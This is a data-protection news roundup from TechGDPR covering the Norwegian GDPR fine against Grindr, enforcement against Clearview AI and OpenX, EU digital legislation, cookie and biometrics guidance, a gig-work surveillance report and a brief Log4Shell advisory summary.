TechGDPR’s review of international data-related stories from press and analytical reports.
Grindr’s privacy fine in focus
Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, an over 6 mln euro privacy fine for disclosure of user data to third parties behavioural ads without a legal basis. The offenses were committed before April 2020, when its terms of use and consent management platform were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender, and use of the app. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the apps and the advertising vendors. At the same time, Grindr failed to comply with the most of the requirement for freely given, specific, informed and unambiguous consent and its withdrawal for such data sharing:
- users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
- the consents for sharing data with its advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically if they wanted to allow their data to be shared with third parties ads);
- the information about the sharing was not properly communicated to users;
- refusing consent was dependent on the user’s patience and technological understanding, and it did not demonstrate a fair, intuitive and genuine free choice.
Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy, could upgrade to the paid version. However, the regulator pointed out, at the time of registration the users were not given the choice to opt for the paid version of the app. The user would first have to go through the above described consent mechanism. It was only after this process that the user could decide to upgrade to the paid version.
Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR, (Data protection by Design and by Default). Participants in the ad tech ecosystem would likely only receive a “blinded” app-ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.”
The Norwegian regulator however stated that even if the app-ID in some instances was “blinded”, the recipient could still receive keywords relating to the Grindr app. As an example, OpenX, who Grindr consider to be its processor, appended keywords “gay”, “bi” and “bi-curious” in ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read a 70-page fine notice of the Grindr case (available in English) with more facts and relevant GDPR provisions explained.
Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data
In Finland, a psychotherapy Center was issued a privacy fine over a failure to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020. The company found a blackmail message: the patient database has been uploaded to the attacker’s servers and a ransom was demanded to recover the lost data. A sample of the patient database was attached to the threat letter. Later it became clear that the hacking had probably already taken place in 2018, and another hack took place in 2019 due to the poor protection of the patient information system. The data protection impact assessment carried out by the respondent also did not meet the requirements of Art. 35 (7) of the GDPR. Finally, the company did not have a documented notification procedure in place at the time of the security breaches.
French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly-available images worldwide, to stop illegal use of biometric data from people in France and delete it within two months. The UK Information Commissioner’s Office, which worked with the Australians on the Clearview investigation, also said last month it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.
California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC.
Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act
The EDPB published its contribution to the EU Commission’s evaluation of the Data protection Law Enforcement Directive (LED). It is a piece of EU legislation, parallel to the GDPR, which also came into effect in 2018. LED aims at supporting the possibility of police authority co-operation through the exchange of personal data. Previously, EU legal instruments in this area have been limited to data protection rules for EU agencies, large scale IT systems established under EU law or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. However, new legislative and technological developments in the processing of data for law enforcement purposes have increased the workload of EDPB members. Also, data protection authorities may often have to balance their resources between supervision of the GDPR and the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.
The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviours. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing, and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional requirements on:
- the use of data for targeted or micro-targeted advertising and the interoperability of services, (eg, number-independent interpersonal communication services, social network services);
- gives users the option to uninstall pre-installed software applications, such as apps, on a core platform service at any stage.
The text approved will be Parliament’s mandate for negotiations with EU governments, planned to start in the first semester of 2022. The Digital Services Act (DSA) – a parallel proposal to regulate online platforms dealing with, among other issues, profiling algorithms, deceiving or nudging techniques to influence users’ behaviour through “dark patterns” – is due to be put to the vote in plenary in January. Read also the latest analysis of the DSA’s possible effect for EU residents’ fundamental rights and freedoms by Baker McKenzie.
Meanwhile, Australia and the US signed a Cloud Act deal to help law enforcement agencies demand data from tech giants, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain information. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian reports.
Official guidance: SMEs, developers, biometrics, cookies
The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online tracers and on audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities that have led to data breaches notified to the CNIL, and presents examples of measures that would have made it possible to avoid them. In total, the guide now includes 18 thematic sheets that cover most of the developers’ needs to support them at each stage of their project from identifying and minimizing the personal data collected to preparing for the exercise of data subjects rights, managing the retention periods, and technical implementation of legal bases.
The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organizations still do not allow online users to refuse cookies as easily as to accept them. The CNIL decided to send 30 new formal notices. The recent checks observe that:
- cookies, subject to consent, were automatically placed on the user’s terminal equipment before acceptance;
- information banners are still not compliant because they do not allow the user to refuse cookies as easily as accepting them;
- information banners can offer the user a means of refusing cookies with the same degree of simplicity as that provided for accepting them, but the proposed mechanism is not effective because cookies, subject to consent, are still placed after the refusal expressed by the user.
The following are particularly affected by these new formal notices: public establishments, higher education establishments, the clothing industry, transport sector, mass distribution sector, and distance selling sector.
In Germany, the Saxony-Anhalt data protection commissioner published its guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in various industries collect, store and use personal data from customers, employees or suppliers, often in a variety of ways – and must comply with data protection. The State Commissioner has received numerous inquiries from these companies for a long time.
- What customer or employee data is a company allowed to collect?
- How long may the data be stored?
- What should be done when customers exercise their data protection rights or employee data has been encrypted by a cyber attack?
Answers to these and many other typical questions are provided by the State Commissioner in the newly published guide. Read the full text here.
The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data is qualified as a special category of personal data (Art. 9 GDPR). The recommendation includes a general prohibition to process such data, unless a specific ‘derogation’ is granted, either the explicit consent of the data subject, or the necessity for reasons of substantial public interest. Since there is currently no legal norm in Belgian law that authorizes the processing of biometric data for the authentication of individuals, and insofar as explicit consent cannot be invoked, such processing is currently performed without a legal basis. Other key takeaways are:
- it is important to consider whether the performance of a contract or the provision of a service is conditioned on the consent being provided.
- a presumption of consent not being “freely given”, exists in particular in employer-employee relationships and where a product or service has a (quasi-) monopoly in the market.
- Purpose limitation, data minimization and proportionality principles are particularly important for the processing of biometric data.
- Data protection impact assessments will generally be required.
- No transition period for companies is provided.
Opinion: What if your boss was an algorithm?
Privacy International with its partners have teamed up to challenge the unprecedented surveillance that gig economy workers are facing from their employers. They decided to file over 500 data subject access requests, (DSARs), to seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola, and Uber. They also interviewed gig-workers. According to their report, several gig economy employers seem reluctant to fully comply with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate a score which is then used to prioritise dispatch of journeys to drivers. Some companies also failed to provide the guidance documents or location data that is gathered. Finally, the report demonstrates that surveillance is not just vast data collection, but also the use of more invasive technologies. The report provides specific examples where facial recognition technology ended up locking drivers out of their account due to potential identity verification failures.
Data security: Log4j follow up
The EU Commission, the EU Agency for Cybersecurity, CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the well-known open source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity and the complexity of patching in some of the impacted environments, it is important that all organisations, especially entities who fall under the Network and Information Security Directive, assess their potential exposure as soon as possible. The latest recommendations so far could be found in:
- list of vulnerable software, maintained by the Dutch National Cyber Security Center,
- advisory notices published by the CSIRTs Network Members in their relevant official communication channels,
- guidance given by CERT-EU.
Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphones duopoly
Microsoft is rolling out end-to-end encryption, (E2EE), support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and testing a public preview since October, Teams is getting the E2EE security support for all one-to-one calls. Microsoft currently encrypts data in transit and at rest, allowing authorized services to decrypt content. Microsoft also uses SharePoint encryption to secure at-rest files and OneNote encryption for notes stored in Microsoft Teams. All chat content in Teams is also encrypted in transit and at rest.
US telecom giant Verizon signed a deal with Alphabet’s Google Cloud to use its 5G network and the tech firm’s computing power to offer services such as autonomous robots and smart factories, says Reuters. Telecom companies have been partnering with technology firms to automate businesses and factories to lower costs and speed up data traffic through private 5G networks that do not jostle for speed with others on a public network. Verizon has also been making private 5G deals in several countries and has partnered with other cloud operators such as Microsoft’s Azure and Amazon’s AWS. Reportedly “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.
The US Consumer Financial Protection Bureau, (CFPB), asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that the financial products are putting consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. As an example, a recent survey by personal finance company Credit Karma found that one-third of US consumers who used “buy-now, pay-later” services have fallen behind on one or more payments, and 72% of those said their credit scores declined.
Apple and Google have a “vice-like grip” over people’s mobile phones and their duopoly over the market should be investigated by the proposed new regulator, the UK’s competition authority, the CMA. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit, (DMU), which will be part of the CMA, has been set up in shadow form until the government officially grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will affect only those companies deemed to have strategic market status, although no tech firms have been officially awarded that status yet, the Guardian reports.